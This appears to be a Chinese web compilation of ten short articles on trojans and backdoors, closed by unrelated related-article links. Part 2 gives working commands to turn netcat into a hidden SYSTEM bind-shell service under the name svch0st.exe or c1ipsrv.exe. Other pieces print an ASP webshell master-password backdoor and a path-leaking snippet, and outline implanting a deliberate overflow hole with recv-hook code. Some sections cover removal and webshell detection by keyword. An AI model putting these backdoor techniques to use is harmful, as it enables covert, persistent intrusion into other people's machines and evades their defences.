教你做服务级的木马后门

VOID WINAPI BDServiceMain(DWORD dwArgc, //lpszArgv参数个数LPTSTR* lpszArgv //该数组第一个的参数指定了服务名，可以在后面被 StartService()来调用);

SERVICE_TABLE_ENTRY结构数组要求最后一个成员组都为NULL，我们称之为“哨兵”（所有值都为NULL），表示该服务表末尾。一个服务启动后，马上调用StartServiceCtrlDispatcher()通知服务控制程序服务正在执行，并提供服务函数的地址。StartServiceCtrlDispatcher()只需要一个至少有两SERVICE_TABLE_ENTRY结构的数组，它为每个服务启动一个线程，一直等到它们结束才返回。

篇2：自己手工打造服务级后门

大家都知道nc是一个强大并且灵活的 工具，用他可以做很多事情，譬如做为telnet的客户端口，譬如入侵的时候反弹回来shell，譬如扫描……但是你有没有想过将他打造成一个服务级的后门呢？现在好多跟我一样的菜鸟还不懂得编程，别人写的流行点的后门又经常被杀，那就跟我一起来自己手工制作一个后门吧，不需要任何编程知识菜鸟级的东东哦，

首先请准备好不被杀的nc.exe（随便加个壳就可以了的），还有sc.exe（这个是操作服务的一个小工具，被人称为操作服务的军刀），这些就可以打造我们自己的后门了，后门的要求我想不需要很强的操作功能，只需要当我们连接的时候获得一个system权限的shell就可以了，有了cmdshell做什么不可以呢。如果你需要反弹的后门，也可以做到，自己注册个域名就可以用nc反弹了，因为比较复杂这里就不说了。我们知道nc就是实现我们的后门功能的最经典的工具，我们来看看nc的帮助，命令行下输入nc -h就可以看到，我们主要用到的几个参数如下：

-e 绑定一个程序并且连接时执行

-l 监听模式

-p 指定nc要运行的本地端口

-L 增强了的监听模式，当连接断开时再次监听

至于其他的用法相信各位已经很了解了的，我们以前经常用到的是

nc -l -e cmd.exe -p 8888 \\监听8888端口，当有连接时重定向到cmd.exe实现绑定一个shell\\

这样的形式用serveru等溢出程序执行后来绑定一个可以得到shell的端口8888，我们telnet或者nc连接上来的时候就可以直接获得一个shell。但是这样连接断开之后监听的端口就会关闭，是一次性的，不能再次获得shell，这样当然不适合于做后门了。后来发现nc的这个参数L可以一直保持监听的状态，可以反复连接。用

nc -L -e cmd.exe -p 8888 \\也是绑定的，不过加强了的\\

这样的命令就已经达到我们的目的了，但是我们往往是在溢出的shell里工作，留后门是为了以后的进入，那我们如何保证nc再机器重起之后还可以工作从而实现我们的后门的目的呢？你可以把他放到注册表的Run等启动项下面，但是感觉那样不是太好，有些地方已经被杀毒软件盯上了，把我的后门放到那里实在不是很放心，后来想到干脆作成服务吧！随着系统启动而启动，呵呵。那就看看如何打造服务吧！

首先我们将nc.exe放到%systemroot%\system32下面，起名叫svch0st.exe或者放到%systemroot%\system下面更名叫svchost.exe，这样的目的是为了在任务管理器里看不出异样。然后用sc替换系统的服务，不用改别的，只要修改他的执行路径就可以了，我们就改那个clipsrv.exe服务吧！命令如下：

sc config clipsrv start= auto \\将clipsrv.exe服务设置为自动\\

sc config clipsrv binpath= “c:\winnt\system32\svch0st.exe -L -e cmd.exe -p 8888” \\设置clipsrv.exe服务的启动路径为我们的nc\\

sc start clipsrv \\启动clipsrv.exe服务\\

嘿嘿，但是看看结果吧！看看服务里的显示信息，如图一，很显眼哦！不管，先启动服务然后

netstat -an|find “8888” \\netstat -an的结果中查找8888看我们的程序是否运行\\

如图二，

的确是已经被打开了，但是当显示服务没有响应的时候nc的进程被结束了，这是Windows服务管理机制吧。不是很成功呵，我们继续改造！不懂编程的我们这个时候就会很郁闷，因为不能让服务停止响应的时候我开始想用bat2exe.exe，但是启动服务的时候总是出现拒绝访问的错误，大概是bat2exe出来的exe文件不被系统服务格式所支持，只能想其他的办法了，于是我想到了用Winrar.exe来做我们自己的exe文件，这总该被服务的可执行文件支持吧！至于如何实现编程里的子进程在父进程终止后仍然可以在内存中运行，我用的方法是写个run.vbs然后用cscript.exe来调用，至于如何调用就可以在自解压格式里设置解压后运行cscript.exe run.vbs，如图三。其中Run.vbs里的内容如下：

dim sh \\定义变量\\

set sh=createobject(“wscript.shell”) \\取得WSH对象\\

sh.run “nc -L -e cmd.exe -p 8888”,0 \\执行我们的程序并隐藏错误\\

而自解压的路径写上%systemroot%\system32，这样我们自解压服务程序就做好了，保存为c1ipsrv.exe（不好意思，还是用那个1和l的把戏），放到c:\winnt\system32目录下面。现在修改我们的clipsrv剪切薄服务的具体路径为c:\winnt\system32\c1ipsrv.exe，命令如下:

sc stop clipsrv \\将clipsrv.exe服务设置为自动\\

sc config clipsrv start= auto

sc config clipsrv binpath= “c:\winnt\system32\c1ipsrv.exe” \\设置clipsrv.exe服务的启动路径为我们的nc\\

sc start clipsrv \\启动clipsrv.exe服务\\

现在一切OK了，这样以来我们的程序的参数细节还会被屏蔽，比开始的参数直接放到执行文件路径里好多了。我们来实验下。先net start clipsrv，然后netstat -an|find “8888”看看开没开8888端口，最后用nc 127.0.0.1 8888连接上去得到shell了呵！如图四。好了，快去体验自己动手的快乐哦，你还可以作其他的事情，只要你的服务的程序做的够好，甚至可以用反向回来的nc，具体我就不写了。

本文是我看了韩的一个动画之后想到的，后来自己想到完全可以将nc改成后门的，不过也还是有很大的缺陷，毕竟不是编程，因为不能返回信息给服务控制器，会在日志里留一些错误，不过，有多少人去在意这些错误呢？还有就是没有身份验证功能，不过端口可以自定义不知道算不算一个身份验证。

篇3：用简单的asp木马后门，来找asp木马后门

我等小菜自己写不来asp马，只能用大虾写的，但网上流传的都不知道是几手的了, 难免有些居心不良的人会在里面加后门，

好不容易拿到个shell又被别人偷走了怎么甘心啊！所以在下完asp木马后要先检查有没后门，通常加了后门的为了隐秘性，都会加密！所以首先我们要先解密 asp木马解密工具解密后先检查有无万能密码，也就是说就算你改了木马的密码，他也能用这个密码来登录

正常的：

EnD fUNCtION

IF SEssIoN(“web2a2dmin”)UsERpaSs thEn

IF requeSt.FoRM(“pass”)“” TheN

iF REquesT.foRM(“pass”)=uSERPASS Then

SEsSIoN(“web2a2dmin”)=uSERPAss

rESPOnsE.rEdirEct Url

ELse

rrs“对不起,密码验证失败!”

加有万能密码的：

EnD fUNCtION

IF SEssIoN(“web2a2dmin”)UsERpaSs thEn

IF requeSt.FoRM(“pass”)“” TheN

iF REquesT.foRM(“pass”)=uSERPASS or request.form(“pass”)=“1111111” Then

SEsSIoN(“web2a2dmin”)=uSERPAss

rESPOnsE.rEdirEct Url

ELse

rrs“对不起,密码验证失败!”

1111111就是传说中的万能密码了，

找到万能密码代码后把or request.form(“pass”)=“1111111” 删除就OK了！

下面来找马大多数都喜欢用框架挂马：

找到后删了，到此asp后门就算剔除了！

下面教大家后门的原理：

这是一段收信的asp代码将其保存为1.asp

以下是引用片段：

<%url=Request.ServerVariables(“HTTP_Referer”)

set fs=server.CreateObject(“Scripting.FileSystemObject”)

set file=fs.OpenTextFile(server.MapPath(“bobo.txt”),8,True)

file.writeline url

file.close

set file=nothing

set fs=nothing

%>

代码基本意思就是：“HTTP_REFERER” 链接到当前页面的前一页面的 URL 地址

简单来说就是获得webshell的地址然后记录在bobo.txt这里文本里

上传到空间比如 127.0.0.1/1.asp

以下是引用片段：

插到asp木马中,那么别人访问这个被挂了马的asp木马就会生成个bobo.txt里面就会有asp大马的路径了

我们学习他是为了更好的理解，大家千万别用来整菜鸟！

篇4：用简单的asp木马后门 找asp木马后门

好不容易拿到个shell又被别人偷走了怎么甘心啊!所以在下完asp木马后要先检查有没后门，通常加了后门的为了隐秘性，都会加密!所以首先我们要先解密 asp木马解密工具解密后先检查有无万能密码，也就是说就算你改了木马的密码，他也能用这个密码来登录

正常的：

EnD fUNCtION

IF SEssIoN(“web2a2dmin”)UsERpaSs thEn

IF requeSt.FoRM(“pass”)“” TheN

iF REquesT.foRM(“pass”)=uSERPASS Then

SEsSIoN(“web2a2dmin”)=uSERPAss

rESPOnsE.rEdirEct Url

ELse

rrs“对不起,密码验证失败!”

加有万能密码的：

EnD fUNCtION

IF SEssIoN(“web2a2dmin”)UsERpaSs thEn

IF requeSt.FoRM(“pass”)“” TheN

iF REquesT.foRM(“pass”)=uSERPASS or request.form(“pass”)=“1111111” Then

SEsSIoN(“web2a2dmin”)=uSERPAss

rESPOnsE.rEdirEct Url

ELse

rrs“对不起,密码验证失败!”

1111111就是传说中的万能密码了，

用简单的asp木马后门 找asp木马后门

，

找到万能密码代码后把or request.form(“pass”)=“1111111” 删除就OK了!

下面来找马大多数都喜欢用框架挂马：

找到后删了，到此asp后门就算剔除了!

下面教大家后门的原理：

这是一段收信的asp代码将其保存为1.asp

以下是引用片段：

代码基本意思就是：“HTTP_REFERER” 链接到当前页面的前一页面的 URL 地址

简单来说就是获得webshell的地址然后记录在bobo.txt这里文本里

上传到空间比如 127.0.0.1/1.asp

以下是引用片段：

插到asp木马中，那么别人访问这个被挂了马的asp木马就会生成个bobo.txt里面就会有asp大马的路径了

我们学习他是为了更好的理解，大家千万别用来整菜鸟!

篇5：dedecms官方包含一句话后门木马

应该是前几天出的那个dedecms的0day.官方的网站被日，然后被在风格模板里面值入了一句话木马，XXOO。

应该是前几天出的那个dedecms的0day.官方的网站被日，然后被在风格模板里面值入

了一句话木马，

XXOO。这年头啥多靠不住。”官方”也一样！你懂得的？

另外一个目录也有。

有在织梦官方下过模板的同学快看看吧。

BY:TOOLS论坛。

篇6：粉碎内核级Byshell木马

Byshell大家应该比较熟悉的

Byshell是一个无进程、无DLL、无启动项的、集多种Rootkit技术特征的独立功能远程控制后门程序（Backdoor），其利用线程注射DLL到系统进程，解除DLL映射并删除自身文件和启动项，关机时恢复。它是内核级的木马程序，主要部分工作在Ring0，因此有很强的隐蔽性和杀伤力。

通常用Byshell木马程序远程控制安装了Windows NT//XP/操作系统的机器。当Byshell被安装在一台远程计算机上后， 就拥有完全控制该机器的能力，并且不会被已控制机器所安装的杀毒和防火墙等软件及管理员手工检测出来。

如何绕过主动防御

Byshell利用Rootkit技术，可以绕过严格的防火墙或者边界路由器访问控制，无论从内网或者外网的被控端，都可以轻松连接到外网的控制端。该技术所建立的连接也会被隐藏，被安装该后门程序的机器都不能看到该后门使用的连接。

同时，它没有自己的独立进程，也不会在任务管理器或者绝大部分第三方进程管理工具中出现新进程。它使用一个隐藏的iexplore.exe进行对外连接，可以绕过防火墙的应用程序访问网络限制。在注册表中找不到由它建立的启动项，无任何RUN键值，避免了被Msconfig之类程序检测到。ByShell木马通过对当前系统的SSDT表进行搜索，接着再搜索系统原来的使用的SSDT表，然后用以前的覆盖现在的SSDT表。木马程序则又可以按照正常的顺序来执行，这样就最终让主动防御功能彻底的失效，

五步清除Byshell

1． 安装一个具备进程管理功能的安全工具软件，查看系统进程，可以看到很多被明显标识出的进程。这些进程都是可疑进程，很有可能有些进程已被植入木马病毒。点击其中的IE浏览器进程，发现其中包括了一个可疑的木马模块hack.dll。

2． 找出来该安全工具软件中与服务管理相关的选项，同样可以看到多个被明显标识出的系统服务，说明这些服务都不是系统自身的服务。经过查看发现一个名为Hack的服务较为可疑，因为它的名称和木马模块的名称相同。

3． 找出工具软件中与文件管理相关的标签，在模拟的资源管理器窗口中，按照可疑模块的路径指引，很快发现了那个可疑的木马模块文件hack.dll，与此同时还发现一个和模块文件同名的可执行文件，看来这个木马主要还是由这两个文件组成的。

4． 现在我们就开始进行木马的清除工作。在进程管理选项中首先找到被明显标识的IE浏览器进程，选中它后通过鼠标右键中的“结束这个进程”命令清除它。接着点击服务管理选项，选择名为Hack的服务后，点击右键菜单中的“删除选中的服务”命令来删除。再选择程序中的文件管理选项，对木马文件进行最后的清除操作。在系统的system32目录找到hack.dll和hack.exe文件后，点击右键菜单中的“直接删除文件”命令，完成对木马的最后一击。然后重新启动系统再进行查看，确认木马是否被清除干净。

5． 由于木马程序破坏了杀毒软件在SSDT表中的内容，因此大家最好利用软件自带的主动修复功能来进行修复，或者重新将杀毒软件安装一次即可。

以前的木马种植以前， 最重要的工作就是对其进行免杀操作，这样就可躲过杀毒软件的特征码检测。现在ByShell已经有木马可以突破主动防御，以后这类木马也会越来越多，因此大家一定要加强自己的安全意识。

篇7：泡泡堂木马变种后门病毒盗帐号密码

泡泡堂木马变种后门病毒盗帐号密码

CNET中国.ZOL8月5日报道：北京信息安全测评中心、金山毒霸联合发布008月5日热门病毒，今日提醒用户特别注意以下病毒：“罗伯特”(Hack.Rbot)和“泡泡堂大盗变种gw”(Troj.WGamec.gw)

“罗伯特”(Hack.Rbot) 病毒， 可通过IRC命令控制受病毒感染的主机，

“泡泡堂大盗变种gw”(Troj.WGamec.gw)木马病毒，盗取网游“泡泡堂”用户帐号密码信息，将信息发送给病毒作者。

据瑞星全球反病毒监测网介绍，今日有一个病毒特别值得注意，它是：“麦波变种JCU（Backdoor.MyBot.jcu）”病毒。该病毒会试图利用多个微软系统漏洞进行传播，感染此病毒的计算机会被 远程控制，用户的银行卡等的账号、密码可被 窃取。

篇8：某出名后门木马的解密 一

看到一很漂亮WEBSHELL

我就把SHELL下载了 解密之分析了一下，

某出名后门木马的解密 一

，

。。

篇9：用搜索神器Everything定位Webshell木马后门

Everything是速度最快的文件名搜索软件，其速度之快令人震惊，百G硬盘几十万个文件，可以在几秒钟之内完成索引；文件名搜索瞬间呈现结果。它小巧免费，支持中文，支持正则表达式，可以通过HTTP或FTP分享搜索结果。

Everything搜索工具的最大优点是速度。其速度不是快，是极快；用户不是满意，而是震惊。

因为Everything的索引无需逐一扫描硬盘文件，而是直接读取NTFS文件系统的USN日志。所以速度已经快到令人震惊，甚至是愤怒了：凭什么可以这么快！

“善用佳软”上有Everything的详细介绍：xbeta.info/everything-search-tool.htm

—–分割线—–

小菜最近闲着无事，搭建了一个blog，但因为是第一次，比较紧张，害怕被 入侵，所以狂补安全方面的知识，但无奈自身水平不够，而且在了解了一些安全知识之后认为如果网站被盯上了，被入侵是迟早的是，所以，我只好做被入侵之后的打算了：尽可能的查找被嵌入的webshell……

然后最近也在总结一些软件的使用经验，刚好到了Everything这款搜索神器，学着学着就想试试用Everything来辅助webshell的查找，也就有了下面的内容（这里查找的思路是通过文件的修改时间来进行判断的，因为对于一个相对稳定的网站来说，网页代码不会经常性的发生变化，所以可以通过文件的修改时间进行辅助判断）：

1.通过文件的修改日期

dateaccessed:#搜索在指定日期被访问的文件或文件夹datecreated:#搜索在指定日期被创建的文件或文件夹datemodified:#搜索在指定日期被修改的文件或文件夹da:#dateaccessed:的简写dc:#datecreated:的简写dm:#datemodified:的简写

其中的date的语法格式和一些常量如下：

date格式:

yearmonth/year or year/month depending on locale settingsday/month/year, month/day/year or year/month/day depending on locale settings

一些date的常量:

todayyesterdaytomorrowjanuary|february|march|april|may|june|july|august|september|october|november|decemberjan|feb|mar|apr|may|jun|jul|aug|sep|oct|nov|decsunday|monday|tuesday|wednesday|thursday|friday|saturdaysun|mon|tue|wed|thu|fri|satunknown

实际使用举例如下：

C:\Users\userName\Desktop datecreated:yesterday    #查找桌面上昨天修改过的文件or文件夹C:\Users\userName\Desktop datemodified:today    #查找桌面上今天修改过的文件or文件夹C:\Users\userName\Desktop datemodified:/6/15    #查找桌面上在2014/6/15这天修改过的文件or文件夹{2014/6/15这个格式和你本地的设定有关，你可以打开Everything看“Date Modified”那一列的显示格式}C:\Users\userName\Desktop datemodified:lastweek    #查找桌面上上个星期修改过的文件or文件夹C:\Users\userName\Desktop datemodified:january    #查找桌面上在一月份修改过的文件or文件夹

提示：最好指定一个路径来进行搜索（例如在进行webshell检测时，指定网站目录），否则速度很慢{当然了，这与个人电脑配置有关，在我的瓜机上面很慢就是了}

2.通过文件大小

使用语法介绍：

size:Search for files with the specified size in bytes.Size Syntax:size[kb|mb|gb]Size Constants:emptytiny0 KB < size <= 10 KBsmall10 KB < size <= 100 KBmedium100 KB < size <= 1 MBlarge1 MB < size <= 16 MBhuge16 MB < size <= 128 MBgiganticsize > 128 MBunknown

实际举例如下：

一般的webshell文件也不大{当然了，区分大小马}，所以可以试试查找大于0KB小于10KB的文件（size:tiny）

查找文件大小小于50KB的文件方法（size:<=50kb）

当然也可以通过查找PHP文件，然后再按文件大小排序的方式来进行，

3.简洁实用的手动方式

C:\Apache\htdocs *.php#显示了结果之后，再按照文件修改时间/大小/文件名排序，快速而且直接C:\Apache\htdocs *.php | *.jpg

一般是通过指定搜索路径的方式来加快速度，可以通过多种方式的结合来达到自己的目的，这个需要根据自己的情况来定，这里就不细说了。

上面提供的只是一种思路，在Windows上也可以通过批处理脚本或PHP/Python脚本编写功能更强大的webshell查找工具（之前在Freebuf上也有过几篇很好的文章，比如：www.myhack58.com/tools/8341.html），不过就效率，速度和直观性而言，Everything这款工具确实还是非常值得推荐的！Everything还有很多的功能值得我们去发现、去挖掘，多组合、多尝试就可以找到适合自己的方法，祝好运！

编程高手也可以自行编写脚本调用Everything的命令行来进行周期性的扫描、报告，如果写好了能给大家分享一下那就更好了(☆_☆)/~~

————————–

在Linux上因为原生集成了很多命令行工具，速度也是非常快，所以也不用其他多余的工具了，写个shell脚本，然后放在crontab中周期性运行并把结果发送给自己，效果还是很不错的。

—–下面是从网上搜集的一些使用find/xargs/grep的命令组合查找webshell的方法—–

查找“/path/to/webroot”目录里面在10天内进行过修改的php文件（可根据需要进行微调）：

find /path/to/webroot -name “*.php” -mtime -10

如果文件更新时间不确定，我们可以通过查找关键字的方法来确定。要想查的准确需要熟悉webshell常用的关键字，我这里列出一些常用的，其他的大家可以从网收集一些webshell，总结自己的关键字，括号里面我总结的一些关键字（eval,shell_exec,passthru,popen,system）查找方法如下：

find /path/to/webroot -name “*.php” |xargs grep “eval” |lessfind /path/to/webroot -name “*.php” |xargs grep “shell_exec” |lessfind /path/to/webroot -name “*.php” |xargs grep “passthru” |less

当然你还可以导出到文件，下载下来慢慢分析：

find /home -name “*.php”|xargs grep “fsockopen”|tee webshell_scan.log

这里我就不一一罗列了，如果有自己总结的关键字直接替换就可以。当然并不是所有的找出的文件都是webshell，这个需要自己做一下判断，判断的方法也简单，直接从浏览器访问一下这个文件或者和自己找的一些webshell比较一下，看得多了，基本上一眼就可以判断是不是webshell文件。

因为Linux上的这个的查找方法在各种网站上都有类似的内容，没法找到原文出处，如有请告知，谢谢。

最后来点猛料：

在查找webshell的时候，集中注意力是非常必要的，可如果你昨天看了些小电影而导致精力不足无法集中精神排查的话可是非常要命的，所以，你需要：

打开Everything，在搜索框中输入: *.rm | *.rmvb |*.avi | *.wmv | *.mkv | *.mpeg | *.3gp，按大小排序，选择非系统视频文件，深呼吸，闭眼，手不要抖，按住Shift+Del键(是的，shift+del，剥夺它们进回收站的权利)，睁眼，露出灿烂的笑容，生活原来如此美好

篇10：溢出植入型木马(后门)的原型实现

感谢与申明

感谢此文成型中获得的如下人员的讨论与支持

XUNDI,大鹰,冰河,ALERT7, BENJURRY,ISNO,REFDOM给予的技术讨论和提出了有益的意见

感谢所有到会成员给予的指点

申明:

作者无意实现一个木马,只是提供一种思路:将缓冲区溢出攻击和木马/后门相结合的木马实现手段,通过一个简单的原型来验证,并展示给大家这种实现方式的一些特点.作者提供关键代码段的技术实现的文档和演示来验证其实现,但不提供源代码和二进制程序,任何人都可以利用此文进行自己的技术研究和代码实现,但是自己负担自己开发程序进行非法行为的法律责任.

基本思路

木马(后门)如何有效的隐蔽

溢出植入型木马(后门)的思路

溢出植入型木马(后门)的优势

木马(后门)如何有效的隐蔽

应用/代码本身的隐蔽

应用进程执行的隐蔽

自动启动相关的隐蔽

通讯的隐蔽

当前木马/后门发展的趋势

驱动和内核级

拦截系统调用服务来实现系统级的隐蔽

存在的问题

代码量多

影响一定的性能

实现需要高的技巧与技能

溢出植入型木马(后门)的思路

被动工作式的木马

瘦服务器端的木马

依赖于系统机制进行加载,和执行

溢出植入型木马(后门)的优势

为什么会选择溢出植入

溢出漏洞具备通用性

溢出漏洞具备非常好的隐蔽性

溢出本身就可以实现远程的控制

溢出的攻击程序指令是由数据传输的,灵活,不留痕迹

在服务内部进行,很容易实现进程,通讯,启动代码的隐藏

完全被动方式工作,对性能等影响小.

制造一个溢出漏洞比较简单和容易实现.

Recv(s,buf,100,0);

Recv(s,buf,200,0);

BUF(100)

OTHER

BUF(100)

被覆盖

通用溢出漏洞的植入

通用化溢出漏洞要解决的4个问题

实现植入通用化溢出漏洞的思路

植入通用化溢出漏洞的实现

木马(后门)的在W2K下的实现

通用化溢出漏洞要解决的4个问题

溢出点定位

JMP ESP代码提供和定位

溢出覆盖后对变量的引用访问违例

溢出覆盖后执行代码对溢出区的修改

实现植入通用化溢出漏洞的思路

扩展堆栈

植 入某个特定函数的替换转发函数

扩展堆栈

PUSH EBP

MOV EBP,ESP

SUB ESP,XXX

(代码执行区)

ADD ESP,XXX

PUSH EBP

YYY>XXX

PUSH EBP

MOV EBP,ESP

SUB ESP,YYY

(代码执行区)

ADD ESP,YYY

PUSH EBP

返回地址

其他变量

上级函数变量

传入参数

目标BUF

xxx

返回地址

其他变量

上级函数变量

传入参数

目标BUF

xxx

多出的空间

Yyy-xxx

多出空间的作用

自动调整大小,使得溢出点一致

多余空间内放置SHELLCODE,不会被后面修改

可精心选择覆盖内容.避免访问违例

需要的条件

对传入参数引用使用EBP+XXX,对变量引用使用ESP+XXX的方式

替换转发函数

0X4444

Recv函数地址

PUSH FLAG

PUSH XXX

PUSH BUF

PUSH S

CALL [0X4444]

0X4c88

Recv函数地址

PUSH FLAG

PUSH XXX

PUSH BUF

PUSH S

CALL [0x4444]

RecvAdd代码:

PUSH FLAG

PUSH YYY

PUSH BUF1

PUSH S

CALL [0x4c88]

COPY(BUF,BUF1,XXX)

RET

0X4444

RecvAdd函数地址

替代转发函数的作用

可以制造一个完全通用的溢出漏洞

溢出点可控

不会引发访问违例

在溢出控制前BUF内容不会被修改

可以解决一些更多的技术问题

植入的通用化溢出漏洞的实现

JMP ESP提供和定位

RECV函数的替换转发函数实现

更深层次的利用

DWORD WINAPI recvadd(SOCKET s,char FAR* buf,int len,int flags){

int num; char buf1[0x1190];

if(len>0x1000)

num = recv(s,buf,len,flags);

else{

num = recv(s,buf1,0x11a9,flags); //扩大到标准指定的溢出点上

if(num>0) { //判断是否收到包

if(num<=len) //判断是否溢出,没有则拷贝内存

memcpy(buf,buf1,num);

else { //提供JMP ESP的地址

num=-1;

_asm{ mov eax,1010101H

mov [esp+11A4H],eax;

}}}}

return num;}

更深层次的利用

检测溢出和溢出返回地址

其他需要利用的变量提供

环境保护和线程的安全返回

新的替换转发函数的汇编实现

木马(后门)的在W2K下的实现

植入代码结构

PE文件节点分析和代码的附加

附加代码的自动计算和替换

调用函数分析和导入表的替换

植入代码结构

RECVADD替代函数地址

RECVADD

函数

RECV函数地址

JMP ESP代码

PE文件结构

导入函数节

代码节

多余代码节

空间

数据节

代码附加过程

分析代码节接点空间

找到需要替换的函数地址

在进程空间查找对应地址的导入地址

替换函数调用地址

存在jmp [recv] 的形式,替换为jmp [recvadd]

不存在jmp [recv] 的形式,直接替换每个call [recv]

保留真实的recv的地址,计算jmp esp代码和recvadd的地址,替换到植入代码的对应偏移处

附加代码,并进行相应PE头修改,自我删除

通用远程溢出的SHELLCODE

函数定位处理

SOCKET复用

环境变量引用和环境上下文保护

溢出线程的安全返回

SOCKET复用

SOCKET复用的意义

基本思路 (针对阻塞式SOCKET)

获得有效的SOCKET描述符

判断关联的SOCKET描述符的线程 (2次连接)

挂起SOCKET相关的线程

接管SOCKET通讯

实现代码

非阻塞式SOCKET的复用

环境变量引用和环境上下文保护

引用的变量和作用

SOCKET描述符号

转发函数参数占用堆栈的大小

函数返回地址

环境上下文和积存器的保护

溢出线程的安全返回

安全返回的意义

需要考虑的问题

保存溢出SHELLCODE执行前的积存器内容

保存需要返回的地址值

计算恢复后的ESP/EBP,好放入对应的地址值.

在恢复积存器后,还需要使用积存器读取返回地址值并放入返回前的ESP和读取函数在溢出前提供的函数参数大小来计算正常的ESP,因此对于积存器的保护需要一点技巧.

安全返回的代码实现

演示植入溢出到TEST服务并远程控制

阐发

饶过WIN的系统文件完整性保护(SFP)

溢出植入的通用化测试

探讨:只修改内存影象避免文件完整性检查

饶过WIN的SFP

饶过SFP的意义

SFP的基本实现机理

饶过的思考

饶过SFP的实验

溢出植入的通用化测试

溢出植入的过程是完全通用的

溢出植入的替代函数是只针对函数级通用的

溢出植入远程控制端是完全通用且可根据需要灵活编写和变化的

DNS服务的RECV溢出植入演示

SQL SERVER服务的WSARECV溢出植入演示

通用的WSARECV的替换函数

重载异步IO的SOCKET的内存置换的问题

★ 未来之书作文1000字

★ 关于未来的初三作文1000字

★ 入门初级教程之一

★ 教你如何写出完美的公司年度总结

★ 教你删除Win8系统中的未知账户

★ 学习的幼儿睡前故事:小木偶的故事

★ 团学活动策划书

★ 给大人的六一短信

★ 教你识破网络骗子的七种防骗技巧

★ 父亲节祝愿语

《教你做服务级的木马后门.doc》

将本文的Word文档下载到电脑，方便收藏和打印

推荐度：

点击下载文档

【教你做服务级的木马后门（精选10篇）】相关文章：

WIN技巧：识别木马症状教你轻松搞定木马！2023-02-03

向学校提建议的1000字作文2022-10-05

教你几招关于手机病毒防范及解决的策略2022-05-06

儿童节的祝福短信有哪些2023-07-27

六一儿童节的祝福话语短信微信2023-06-03

教你清除War Trojan木马的操作方法2023-10-13

幽默搞笑儿童节祝福语2022-05-26

教你如何一招把病毒木马全部拒之门外病毒防范2022-07-01

党员必读42本书2023-05-21

我的音乐之梦作文650字2022-06-04